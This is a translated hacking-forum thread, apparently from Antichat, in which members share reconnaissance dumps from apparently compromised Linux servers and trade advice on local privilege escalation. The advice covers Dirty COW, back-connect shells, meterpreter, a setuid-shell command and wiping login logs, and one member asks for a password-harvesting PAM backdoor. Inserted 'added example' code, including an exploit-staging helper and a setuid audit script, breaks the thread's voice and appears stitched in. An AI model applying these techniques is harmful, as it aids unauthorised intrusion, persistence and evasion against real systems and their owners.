    -rw-r--r--  1 root root   29264 2008-09-05 15:21:18.000000000 +0400 libusb-0.1.so.4.4.4
    -rw-r--r--  1 root root    9684 2011-01-08 09:59:32.000000000 +0300 libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:39:24.000000000 +0400 libutil.so.1 -> libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rw-r--r--  1 root root   12912 2008-10-13 07:33:34.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rw-r--r--  1 root root   31168 2008-07-26 03:45:03.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libxtables.so.0 -> libxtables.so.0.0.0
    -rw-r--r--  1 root root   18380 2009-02-09 22:52:34.000000000 +0300 libxtables.so.0.0.0
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:28.000000000 +0300 lsb
    drwxr-xr-x  5 root root    4096 2016-01-21 14:15:29.181003302 +0400 modules
    drwxr-xr-x  2 root root    4096 2010-11-11 17:58:14.000000000 +0300 security
    drwxr-xr-x 15 root root    4096 2010-11-11 17:57:27.000000000 +0300 terminfo
    drwxr-xr-x  3 root root    4096 2013-04-29 14:38:26.000000000 +0400 udev
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:51.000000000 +0300 xtables
    Code:
    $ mount 2>&1
    /dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
    proc on /proc type proc (rw,relatime)
    sysfs on /sys type sysfs (rw,relatime)
    tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime,mode=755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
    Code:
    $ df -h 2>&1
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/simfs             50G   36G   15G  71% /
    tmpfs                 1.0G     0  1.0G   0% /lib/init/rw
    tmpfs                 1.0G     0  1.0G   0% /dev/shm
    Code:
    $ cat /etc/issue 2>&1
    Debian GNU/Linux 5.0 \n \l
    Code:
    $ cat /etc/crontab 2>&1
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    12 * * * * root cd / && run-parts --report /etc/cron.hourly
    53 4 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    46 0 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    55 5 30 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    
    Code:
    $ cat /proc/version 2>&1
    Linux version 2.6.32-37-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Wed Feb 11 10:00:27 CET 2015
    Code:
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    4096
    Code:
    $ ls -la /usr/bin/staprun 2>&1
    ls: cannot access /usr/bin/staprun: No such file or directory
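An added example, not code from any of the posts above: a small Python triage of the `mount` output that PlataOPlomo (post 2) and zifus (post 3) pasted. It answers what a practitioner checks before compiling anything on the box: which mount a working directory actually lives on and whether that mount carries noexec or nosuid (post 2's /tmp does, /home does not), which writable mounts allow exec at all, and whether the root filesystem is simfs, the OpenVZ container filesystem, which means the kernel belongs to the host and /boot is empty for a reason (post 3). The mount lines are copied from those two posts; the working-directory path /home/p2267/www/example/content is a placeholder standing in for the masked path in post 2.

```python
"""Added example: triage of captured `mount` output before staging an exploit binary.

Given the lines a shell on the target printed, answer: which mount holds a given
working directory, does it allow exec / honour setuid, which writable mounts
allow exec at all, and is the root filesystem a container (simfs = OpenVZ)?"""
import re

# Constructed sample: lines copied from post 2 (CentOS 6.8).
MOUNT_POST2 = """\
/dev/sda1 on / type ext4 (rw,noatime)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sda3 on /tmp type ext4 (rw,noexec,nosuid,nodev,noatime,data=writeback,barrier=0)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/dev/sda4 on /home type ext4 (rw,noatime,usrquota,barrier=0)
"""

# Constructed sample: lines copied from post 3 (Debian 5.0 inside a container).
MOUNT_POST3 = """\
/dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
proc on /proc type proc (rw,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
"""

_MOUNT_RE = re.compile(r"^(?P<src>\S+) on (?P<mp>\S+) type (?P<fs>\S+) \((?P<opts>[^)]*)\)$")
PSEUDO_FS = {"proc", "sysfs", "devpts", "binfmt_misc"}


def parse_mounts(text):
    """Return [(mountpoint, fstype, {options})] from `mount` output; skips unparsable lines."""
    mounts = []
    for line in text.splitlines():
        m = _MOUNT_RE.match(line.strip())
        if m:
            mounts.append((m.group("mp"), m.group("fs"), set(m.group("opts").split(","))))
    return mounts


def mount_for(path, mounts):
    """Longest-prefix match: the entry whose mountpoint actually contains `path`."""
    best = None
    for mp, fs, opts in mounts:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best[0]):
                best = (mp, fs, opts)
    return best


def staging_report(path, mounts):
    """Can a binary dropped under `path` be executed, and with its setuid bit honoured?"""
    found = mount_for(path, mounts)
    if found is None:
        return None
    mp, fs, opts = found
    return {
        "mountpoint": mp,
        "fstype": fs,
        "exec_allowed": "noexec" not in opts,
        "suid_honoured": "nosuid" not in opts,
        "writable": "rw" in opts,
    }


def exec_capable_mounts(mounts):
    """Writable, exec-capable, non-pseudo filesystems: candidate places to stage a binary."""
    return sorted(mp for mp, fs, opts in mounts
                  if fs not in PSEUDO_FS and "rw" in opts and "noexec" not in opts)


def container_root(mounts):
    """True when / is simfs, the OpenVZ container filesystem: the kernel is the host's,
    /boot is typically empty (as in post 3), and a kernel exploit hits the shared host kernel."""
    return any(mp == "/" and fs == "simfs" for mp, fs, _ in mounts)


if __name__ == "__main__":
    m2 = parse_mounts(MOUNT_POST2)
    print(staging_report("/tmp", m2))                              # noexec,nosuid: do not stage here
    print(staging_report("/home/p2267/www/example/content", m2))  # placeholder path: lands on /home, exec ok
    print(exec_capable_mounts(m2))
    print(container_root(parse_mounts(MOUNT_POST3)))
```

The longest-prefix match matters: a naive `startswith("/")` test would report every path as living on the root filesystem and miss that /tmp is a separate noexec,nosuid mount. In post 2 the user's shell sits under /home, which is rw without noexec, so compiled exploits run there even though /tmp would refuse them.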
     
  4. YaBtr (Members of Antichat)
    Did you check dirtyc0w?
     
  5. zifus (Member)
    Yes, it's not applicable.
     
  6. Rastamanka (Elder)
    Linux easymoneyeasylife.org 2.6.32-642.11.1.el6.x86_64 #1 SMP Fri Nov 18 19:25:05 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

    total 48
    dr-xr-xr-x. 10 root root 4096 2016-12-17 15:45:47.044000005 +0200 .
    dr-xr-xr-x. 22 root root 4096 2016-12-17 15:50:37.719000033 +0200 ..
    drwxr-xr-x. 3 root root 4096 2016-12-17 15:45:47.044000005 +0200 alsa
    drwxr-xr-x. 3 root root 4096 2016-12-17 15:44:55.387000010 +0200 crda
    drwxr-xr-x. 46 root root 12288 2016-12-17 15:46:04.550000005 +0200 firmware
    drwxr-xr-x. 6 root root 4096 2016-12-17 15:44:23.373000005 +0200 kbd
    dr-xr-xr-x. 3 root root 4096 2016-12-17 15:44:36.126000005 +0200 modules
    drwxr-xr-x. 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x. 6 root root 4096 2016-12-17 15:42:48.750000003 +0200 terminfo
    drwxr-xr-x. 5 root root 4096 2016-12-17 16:17:53.602000064 +0200 udev

    /dev/vda3 on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/vda1 on /boot type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

    Filesystem  Size  Used Avail Use% Mounted on
    /dev/vda3   9.3G  1.4G  7.4G  16% /
    tmpfs       371M     0  371M   0% /dev/shm
    /dev/vda1   240M   34M  194M  15% /boot

    CentOS release 6.8 (Final)
    Kernel \r on an \m

    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # For details see man 4 crontabs

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # | .------------- hour (0 - 23)
    # | | .---------- day of month (1 - 31)
    # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
    # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # | | | | |
    # * * * * * user-name command to be executed

    Linux version 2.6.32-642.11.1.el6.x86_64 (mockbuild@c1bm.rdu2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Fri Nov 18 19:25:05 UTC 2016

    4096

    ---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun


    -rwsr-xr-x. 1 root root 34904 May 11 2016 /bin/su
    -rwsr-xr-x. 1 root root 36488 May 10 2016 /bin/ping6
    -rwsr-xr-x. 1 root root 53472 Nov 18 17:38 /bin/umount
    -rwsr-xr-x. 1 root root 77336 Nov 18 17:38 /bin/mount
    -rwsr-xr-x. 1 root root 38264 May 10 2016 /bin/ping
    -rwsr-xr-x. 1 root root 70480 May 11 2016 /usr/bin/chage
    -rws--x--x. 1 root root 20184 Nov 18 17:38 /usr/bin/chfn
    ---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun
    -rwsr-xr-x. 1 root root 51784 Aug 23 21:36 /usr/bin/crontab
    -rws--x--x. 1 root root 20056 Nov 18 17:38 /usr/bin/chsh
    -rwsr-xr-x. 1 root root 54496 Feb 19 2015 /usr/bin/at
    -rwsr-xr-x. 1 root root 75640 May 11 2016 /usr/bin/gpasswd
    -rwsr-xr-x. 1 root root 22544 Mar 17 2015 /usr/bin/pkexec
    -rwsr-xr-x. 1 root root 30768 Nov 23 2015 /usr/bin/passwd
    -rwsr-xr-x. 1 root root 40240 May 11 2016 /usr/bin/newgrp
    ---s--x--x. 1 root root 123832 Dec 7 02:36 /usr/bin/sudo
    -rwsr-xr-x. 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x. 1 root root 257824 May 12 2016 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x. 1 abrt abrt 10296 May 11 2016 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
    -rws--x--x. 1 root root 14280 May 10 2016 /usr/libexec/pt_chown
    -rws--x--x 1 root root 42288 Aug 22 2010 /usr/sbin/userhelper
    -r-s--x--- 1 root apache 13984 Nov 19 01:49 /usr/sbin/suexec
    -rwsr-xr-x. 1 root root 9000 Jul 12 19:40 /usr/sbin/usernetctl
    -rwsr-x--- 1 root dbus 50552 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x. 1 root root 10272 May 11 2016 /sbin/pam_timestamp_check
    -rwsr-xr-x. 1 root root 34840 May 11 2016 /sbin/unix_chkpwd

    I tried enlightenment. It gave no results(
    Though, as I understand it, there is no compiler there(((
     
    #626 Rastamanka, 17 Dec 2016
    Last edited: 17 Dec 2016
  7. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Tell me, with a user like this, 33 ( www-data ) Group: 33 ( www-data ), can you run bash commands? To run the exploit!
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    First check whether gcc, perl, python, whatever your exploit is written in, are present; it all depends on how the server is set up
     
  9. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    There is no gcc on the server, perl and python are there! I want to try Dirty COW
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    Well, first set up a back-connect so that you have a console, and then go for it; from a web shell it didn't always work for me, I tried a third-party perl script to open a port and connect to my own machine. Once you have a console open, try all the options, and don't forget about security
     
  11. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    293
    Likes Received:
    22
    Reputations:
    0
    Guys, suggest which exploits I can try on Windows Server 2003 SP2 R2 (I'm not sure whether it actually is R2), 32-bit Windows.
    For 7 I found the MS16-032 PowerShell script; on 64-bit 7 it gave me the privileges. But the problem is that the 2003 machine doesn't have PowerShell yet; can it somehow be installed there portably without admin rights, or is the only option rewriting the code in C++ or C#?
    By the way, can anyone recommend a collection of privilege escalation exploits for 32-bit Server 2003.
     
  12. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    C# implementation
    https://www.exploit-db.com/exploits/39809/
     
  13. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,959
    Likes Received:
    1,217
    Reputations:
    704
  14. altblitz

    altblitz Elder

    Joined:
    5 Jun 2009
    Messages:
    3,227
    Likes Received:
    2,607
    Reputations:
    230
    Code:
    char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n";
    Where is the exploit?
    Run a copy of the sh executable from /tmp that pretends to be a shell?
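    As an added defender's example (not code from anyone in this thread): the setuid listing above and altblitz's `cp /bin/sh /tmp/sh; chmod u+s /tmp/sh` line are exactly what a setuid audit is meant to catch. The script below walks a tree, compares each setuid/setgid file's directory against an assumed whitelist of system binary directories, and flags the rest; the whitelist and the demo tree are constructed assumptions.

```shell
#!/bin/sh
# Added example (not from anyone in this thread): audit setuid/setgid files under a
# root and flag any that live outside the directories where a distribution installs
# them, e.g. a setuid copy of a shell planted in /tmp.

# Assumption: directories where setuid binaries are legitimately expected.
# Adjust to match the distribution's own package contents.
EXPECTED_DIRS="/bin /sbin /usr/bin /usr/sbin /usr/libexec /usr/libexec/openssh /usr/libexec/polkit-1 /lib64/dbus-1"

# list_suid ROOT: print every setuid or setgid regular file under ROOT.
list_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# is_expected PATH: succeed if PATH's directory is one of EXPECTED_DIRS.
is_expected() {
    dir=$(dirname "$1")
    for d in $EXPECTED_DIRS; do
        [ "$dir" = "$d" ] && return 0
    done
    return 1
}

# flag_unexpected_suid ROOT: print, relative to ROOT, each setuid/setgid file
# whose directory is not in EXPECTED_DIRS. ROOT=/ audits the live system; any
# other ROOT lets the same check run over a mounted image or a test tree.
flag_unexpected_suid() {
    root=$1
    list_suid "$root" | while IFS= read -r f; do
        case $root in /) rel=$f ;; *) rel=${f#"$root"} ;; esac
        is_expected "$rel" || printf '%s\n' "$rel"
    done
}

# demo: build a constructed tree holding one legitimate-looking setuid binary
# and one planted setuid shell copy, audit it, and print what gets flagged.
demo() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/tmp"
    : > "$root/usr/bin/passwd"; chmod 4755 "$root/usr/bin/passwd"
    : > "$root/tmp/sh";         chmod 4755 "$root/tmp/sh"
    flag_unexpected_suid "$root"   # prints /tmp/sh
    rm -rf "$root"
}

# usage: sh audit_suid.sh demo   (or call flag_unexpected_suid / directly)
if [ "${1:-}" = "demo" ]; then demo; fi
```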
     
  15. dw0rd007

    dw0rd007 New Member

    Joined:
    11 Jul 2015
    Messages:
    45
    Likes Received:
    3
    Reputations:
    0
    Hi guys. I have FreeBSD 10.2, from 2015.

    Is there an exploit for it? Or maybe someone can help bring the PoC up to a working exploit?

    https://cturt.github.io/sendmsg.html


    And also, suggest some rootkit/PAM backdoor (for Linux this time) to collect the passwords entered at login and also accept a "master" password
     
  16. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    Guys, advise me on this situation:
    I have a Dirty CoW that worked.
    Connected via netcat. So I can't switch user via su or login.
    expect is not installed.

    What do I do?)
     
  17. dw0rd007

    dw0rd007 New Member

    Joined:
    11 Jul 2015
    Messages:
    45
    Likes Received:
    3
    Reputations:
    0
    Use a back-connect with a tty (for example python-pty-shells-master, then you will be able to switch user). Or connect over ssh. Don't forget to clean
    /var/log/wtmp /var/log/btmp
     
  18. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    OK, people, I need your help because everything has piled up at once and my brain is fried... There will be several questions, they'll seem noobish to you, but I don't give a damn: better to look stupid and find out than not find out.

    1 - back-connect. For this you need a dedicated IP address, right? If there isn't one but a VPN is used, is a back-connect possible?
    2 - bind port. Seems clear enough, but how do you bind a port for a TTY session? Or rather, spawn a TTY session that waits until I connect to it.
    3 - binary shell. If there is a machine where nothing compiles, and the admin is a jerk in general and half the functions don't work, then supposedly, by rumor, you can run a ./bind_port binary and it binds a port, since my IP isn't dedicated, having first compiled that very binary either on a similar configuration or using msfvenom. IS THAT RIGHT?!
    4 - what do you then connect to that port with? Seriously, with what?? netcat doesn't seem to work?


    that much is clear.
    There are specific conditions. And yes, a hacked dedi in Somalia won't help with TTY



    Screw it, figured it out myself.
    1 - no
    2 - didn't figure out a damn thing
    3 and 4
    here is a guide http://netsec.ws/?p=331


    OK, and now new questions for you from me:
    [*] Meterpreter session 3 opened (*****:45835 -> *****:3443) at 2017-03-15 16:07:22 -0600
    meterpreter > shell
    su firefart
    su: must be run from a terminal
    sudo su
    sudo: no tty present and no askpass program specified

    As far as I understand, the admin went nuts and disabled TTY? Is that even normal?!

    Question: how do I re-login from www-data without privileges to firefart with root privileges?

    P.S. sorry for the emotions, it has really been a hard day...
     
    #638 ACat, 15 Mar 2017
    Last edited: 16 Mar 2017
  19. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    192
    Likes Received:
    96
    Reputations:
    2
    1) you can back-connect to a hacked dedi with a dedicated IP
    or a VPS server in Somalia
     
  20. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    firefart@rz ~ # id
    uid=0(firefart) gid=0(root) groups=0(root)
    ssh helped

    but the question remained unanswered
     